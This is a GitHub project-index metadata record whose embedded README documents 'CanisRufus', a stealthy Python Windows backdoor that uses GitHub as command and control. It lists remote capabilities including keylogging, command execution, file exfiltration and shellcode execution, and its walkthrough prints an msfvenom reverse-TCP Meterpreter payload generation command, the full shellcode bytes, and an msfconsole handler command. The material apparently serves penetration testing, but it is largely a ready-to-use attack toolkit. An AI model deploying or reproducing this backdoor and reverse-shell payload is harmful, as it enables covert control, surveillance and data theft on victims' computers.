{"id":17383463,"url":"https://github.com/maldevel/canisrufus","last_synced_at":"2025-04-08T04:17:21.434Z","repository":{"id":68239548,"uuid":"100094998","full_name":"maldevel/canisrufus","owner":"maldevel","description":"A stealthy Python based Windows backdoor that uses Github as a command and control server","archived":false,"fork":false,"pushed_at":"2017-08-15T15:46:20.000Z","size":34,"stargazers_count":263,"open_issues_count":1,"forks_count":78,"subscribers_count":19,"default_branch":"master","last_synced_at":"2025-03-24T09:17:50.420Z","etag":null,"topics":["backdoor","github","pentest","python","shellcode","windows","windows-backdoor"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/maldevel.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null}},"created_at":"2017-08-12T06:49:40.000Z","updated_at":"2025-02-07T16:33:13.000Z","dependencies_parsed_at":"2023-05-12T02:45:08.526Z","dependency_job_id":null,"html_url":"https://github.com/maldevel/canisrufus","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/maldevel%2Fcanisrufus","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/maldevel%2Fcanisrufus/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/maldevel%2Fcanisrufus/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/maldevel%2Fcanisrufus/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/maldevel","download_url":"https://codeload.github.com/maldevel/canisrufus/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247773721,"owners_count":20993639,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["backdoor","github","pentest","python","shellcode","windows","windows-backdoor"],"created_at":"2024-10-16T07:42:52.306Z","updated_at":"2025-04-08T04:17:21.404Z","avatar_url":"https://github.com/maldevel.png","language":"Python","funding_links":[],"categories":["Other Third-Party C2","\u003ca id=\"b37bc6073be9a78ed6dbd0d21251fc63\"\u003e\u003c/a\u003eGithub"],"sub_categories":["Further Resources on Domain Fronting","\u003ca id=\"842ef8261474bd529ac72c43dcf9c1fa\"\u003e\u003c/a\u003e工具"],"readme":"CanisRufus\n=====\n\nA stealthy Python based Windows backdoor that uses Github as a command and control server.\n\nRequirements\n=====\n\n* Python 2.x\n* pygithub3 module\n* PyCrypto module\n* WMI module\n* Enum34 module\n* Netifaces module\n* pypiwin32 module\n\nFeatures\n=====\n\n* Encrypted transportation messages (AES) + SHA256 hashing\n* Generate computer unique id using system information/characteristics (SHA256 hash)\n* Job IDs are random SHA256 hashes\n* Retrieve system information\n* Retrieve Geolocation information (City, Country, lat, long, etc..)\n* Retrieve running processes/system services/system users/devices (hardware)\n* Retrieve list of clients\n* Execute system command\n* Download files from client \n* Upload files to client\n* Execute shellcode\n* Take screenshot\n* Lock client's screen \n* Keylogger\n* Lock remote computer's screen\n* Shutdown/Restart remote computer\n* Log off current user\n* Download file from the WEB\n* Visit website\n* Show message box to user\n* Ability to change check-in time\n* Ability to add jitter to check-in time to reduce predictability \n\nSetup\n=====\n\nFor this to work you need:\n- A Github account (**Use a dedicated account! Do not use your personal one!**)\n\nDownload/Installation\n=====\n\n* git clone https://github.com/maldevel/canisrufus.git\n* pip install -r requirements.txt\n\nContents\n=====\n- ```canisrufus.py``` a script that's used to enumerate and issue commands to available clients.\n- ```client.py``` the actual backdoor to deploy.\n\nYou're probably going to want to compile ```client.py``` into an executable using [Pyinstaller](https://github.com/pyinstaller/pyinstaller)\n\n**Note: It's recommended you compile client.py using a 32bit Python installation**\n\nUsage\n=====\n```\nusage: canisrufus.py [-h] [-v] [-id ID] [-jobid JOBID] [-list | -info]\n                     [-cmd CMD | -visitwebsite URL | -message TEXT TITLE | -tasks | -services | -users | -devices | -download PATH | -download-fromurl URL | -upload SRC DST | -exec-shellcode FILE | -screenshot | -lock-screen | -shutdown | -restart | -logoff | -force-checkin | -start-keylogger | -stop-keylogger | -git-checkin CHECK | -jitter jit]\n\n      \n    \n    \n _____             _     ______       __           \n/  __ \\           (_)    | ___ \\     / _|          \n| /  \\/ __ _ _ __  _ ___ | |_/ /   _| |_ _   _ ___ \n| |    / _` | '_ \\| / __||    / | | |  _| | | / __|\n| \\__/\\ (_| | | | | \\__ \\| |\\ \\ |_| | | | |_| \\__ \\\n \\____/\\__,_|_| |_|_|___/\\_| \\_\\__,_|_|  \\__,_|___/\n                                                   \n                                                   \n      \n\noptional arguments:\n  -h, --help            show this help message and exit\n  -v, --version         show program's version number and exit\n  -id ID                Client to target\n  -jobid JOBID          Job id to retrieve\n\n  -list                 List available clients\n  -info                 Retrieve info on specified client\n\nCommands:\n  Commands to execute on a client\n\n  -cmd CMD              Execute a system command\n  -visitwebsite URL     Visit website\n  -message TEXT TITLE   Show message to user\n  -tasks                Retrieve running processes\n  -services             Retrieve system services\n  -users                Retrieve system users\n  -devices              Retrieve devices(Hardware)\n  -download PATH        Download a file from a clients system\n  -download-fromurl URL\n                        Download a file from the web\n  -upload SRC DST       Upload a file to the clients system\n  -exec-shellcode FILE  Execute supplied shellcode on a client\n  -screenshot           Take a screenshot\n  -lock-screen          Lock the clients screen\n  -shutdown             Shutdown remote computer\n  -restart              Restart remote computer\n  -logoff               Log off current remote user\n  -force-checkin        Force a check in\n  -start-keylogger      Start keylogger\n  -stop-keylogger       Stop keylogger\n  -git-checkin CHECK    Seconds to wait before checking for new commands\n  -jitter jit           Percentage of Jitter\n```\n\nShellcode Exec\n=====\n\n```\n$ ./msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform Windows EXITFUNC=thread LPORT=4444 LHOST=x.x.x.x -f python\n\nNo encoder or badchars specified, outputting raw payload\nPayload size: 354 bytes\nbuf =  \"\"\nbuf += \"\\xfc\\xe8\\x82\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xc0\\x64\\x8b\"\nbuf += \"\\x50\\x30\\x8b\\x52\\x0c\\x8b\\x52\\x14\\x8b\\x72\\x28\\x0\\xb7\"\nbuf += \"\\x4a\\x26\\x31\\xff\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\xc1\\xcf\"\nbuf += \"\\x0d\\x01\\xc7\\xe2\\xf2\\x52\\x57\\x8b\\x52\\x10\\x8b\\x4a\\x3c\"\nbuf += \"\\x8b\\x4c\\x11\\x78\\xe3\\x48\\x01\\xd1\\x51\\x8b\\x59\\x20\\x01\"\nbuf += \"\\xd3\\x8b\\x49\\x18\\xe3\\x3a\\x49\\x8b\\x34\\x8b\\x01\\xd6\\x31\"\nbuf += \"\\xff\\xac\\xc1\\xcf\\x0d\\x01\\xc7\\x38\\xe0\\x75\\xf6\\x03\\x7d\"\nbuf += \"\\xf8\\x3b\\x7d\\x24\\x75\\xe4\\x58\\x8b\\x58\\x24\\x01\\xd3\\x66\"\nbuf += \"\\x8b\\x0c\\x4b\\x8b\\x58\\x1c\\x01\\xd3\\x8b\\x04\\x8b\\x01\\xd0\"\nbuf += \"\\x89\\x44\\x24\\x24\\x5b\\x5b\\x61\\x59\\x5a\\x51\\xff\\xe0\\x5f\"\nbuf += \"\\x5f\\x5a\\x8b\\x12\\xeb\\x8d\\x5d\\x68\\x33\\x32\\x00\\x00\\x68\"\nbuf += \"\\x77\\x73\\x32\\x5f\\x54\\x68\\x4c\\x77\\x26\\x07\\xff\\xd5\\xb8\"\nbuf += \"\\x90\\x01\\x00\\x00\\x29\\xc4\\x54\\x50\\x68\\x29\\x80\\x6b\\x00\"\nbuf += \"\\xff\\xd5\\x6a\\x05\\x68\\xac\\x10\\x99\\x01\\x68\\x02\\x00\\x11\"\nbuf += \"\\x5c\\x89\\xe6\\x50\\x50\\x50\\x50\\x40\\x50\\x40\\x50\\x68\\xea\"\nbuf += \"\\x0f\\xdf\\xe0\\xff\\xd5\\x97\\x6a\\x10\\x56\\x57\\x68\\x99\\xa5\"\nbuf += \"\\x74\\x61\\xff\\xd5\\x85\\xc0\\x74\\x0a\\xff\\x4e\\x08\\x75\\xec\"\nbuf += \"\\xe8\\x61\\x00\\x00\\x00\\x6a\\x00\\x6a\\x04\\x56\\x57\\x68\\x02\"\nbuf += \"\\xd9\\xc8\\x5f\\xff\\xd5\\x83\\xf8\\x00\\x7e\\x36\\x8b\\x36\\x6a\"\nbuf += \"\\x40\\x68\\x00\\x10\\x00\\x00\\x56\\x6a\\x00\\x68\\x58\\xa4\\x53\"\nbuf += \"\\xe5\\xff\\xd5\\x93\\x53\\x6a\\x00\\x56\\x53\\x57\\x68\\x02\\xd9\"\nbuf += \"\\xc8\\x5f\\xff\\xd5\\x83\\xf8\\x00\\x7d\\x22\\x58\\x68\\x00\\x40\"\nbuf += \"\\x00\\x00\\x6a\\x00\\x50\\x68\\x0b\\x2f\\x0f\\x30\\xff\\xd5\\x57\"\nbuf += \"\\x68\\x75\\x6e\\x4d\\x61\\xff\\xd5\\x5e\\x5e\\xff\\x0c\\x24\\xe9\"\nbuf += \"\\x71\\xff\\xff\\xff\\x01\\xc3\\x29\\xc6\\x75\\xc7\\xc3\\xbb\\xe0\"\nbuf += \"\\x1d\\x2a\\x0a\\x68\\xa6\\x95\\xbd\\x9d\\xff\\xd5\\x3c\\x06\\x7c\"\nbuf += \"\\x0a\\x80\\xfb\\xe0\\x75\\x05\\xbb\\x47\\x13\\x72\\x6f\\x6a\\x00\"\nbuf += \"\\x53\\xff\\xd5\"\n```\n\nGet rid of everything except for the shellcode and stick it in a file:\n\n```\n$ cat shell.txt \n\\xfc\\xe8\\x82\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xc0\\x64\\x8b\\x50\\x30\\x8b\\x52\\x0c\\x8b\\x52\\x14\\x8b\\x72\\x28\\x0f\\xb7\\x4a\\x26\\x31\\xff\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\xc1\\xcf\\x0d\\x01\\xc7\\xe2\\xf2\\x52\\x57\\x8b\\x52\\x10\\x8b\\x4a\\x3c\\x8b\\x4c\\x11\\x78\\xe3\\x48\\x01\\xd1\\x51\\x8b\\x59\\x20\\x01\\xd3\\x8b\\x49\\x18\\xe3\\x3a\\x49\\x8b\\x34\\x8b\\x01\\xd6\\x31\\xff\\xac\\xc1\\xcf\\x0d\\x01\\xc7\\x38\\xe0\\x75\\xf6\\x03\\x7d\\xf8\\x3b\\x7d\\x24\\x75\\xe4\\x58\\x8b\\x58\\x24\\x01\\xd3\\x66\\x8b\\x0c\\x4b\\x8b\\x58\\x1c\\x01\\xd3\\x8b\\x04\\x8b\\x01\\xd0\\x89\\x44\\x24\\x24\\x5b\\x5b\\x61\\x59\\x5a\\x51\\xff\\xe0\\x5f\\x5f\\x5a\\x8b\\x12\\xeb\\x8d\\x5d\\x68\\x33\\x32\\x00\\x00\\x68\\x77\\x73\\x32\\x5f\\x54\\x68\\x4c\\x77\\x26\\x07\\xff\\xd5\\xb8\\x90\\x01\\x00\\x00\\x29\\xc4\\x54\\x50\\x68\\x29\\x80\\x6b\\x00\\xff\\xd5\\x6a\\x05\\x68\\xac\\x10\\x99\\x01\\x68\\x02\\x00\\x11\\x5c\\x89\\xe6\\x50\\x50\\x50\\x50\\x40\\x50\\x40\\x50\\x68\\xea\\x0f\\xdf\\xe0\\xff\\xd5\\x97\\x6a\\x10\\x56\\x57\\x68\\x99\\xa5\\x74\\x61\\xff\\xd5\\x85\\xc0\\x74\\x0a\\xff\\x4e\\x08\\x75\\xec\\xe8\\x61\\x00\\x00\\x00\\x6a\\x00\\x6a\\x04\\x56\\x57\\x68\\x02\\xd9\\xc8\\x5f\\xff\\xd5\\x83\\xf8\\x00\\x7e\\x36\\x8b\\x36\\x6a\\x40\\x68\\x00\\x10\\x00\\x00\\x56\\x6a\\x00\\x68\\x58\\xa4\\x53\\xe5\\xff\\xd5\\x93\\x53\\x6a\\x00\\x56\\x53\\x57\\x68\\x02\\xd9\\xc8\\x5f\\xff\\xd5\\x83\\xf8\\x00\\x7d\\x22\\x58\\x68\\x00\\x40\\x00\\x00\\x6a\\x00\\x50\\x68\\x0b\\x2f\\x0f\\x30\\xff\\xd5\\x57\\x68\\x75\\x6e\\x4d\\x61\\xff\\xd5\\x5e\\x5e\\xff\\x0c\\x24\\xe9\\x71\\xff\\xff\\xff\\x01\\xc3\\x29\\xc6\\x75\\xc7\\xc3\\xbb\\xe0\\x1d\\x2a\\x0a\\x68\\xa6\\x95\\xbd\\x9d\\xff\\xd5\\x3c\\x06\\x7c\\x0a\\x80\\xfb\\xe0\\x75\\x05\\xbb\\x47\\x13\\x72\\x6f\\x6a\\x00\\x53\\xff\\xd5\n```\nrun the console\n\n```\n ./msfconsole -x \"use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST x.x.x.x; run\"\n ```\n ","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmaldevel%2Fcanisrufus","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fmaldevel%2Fcanisrufus","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmaldevel%2Fcanisrufus/lists"}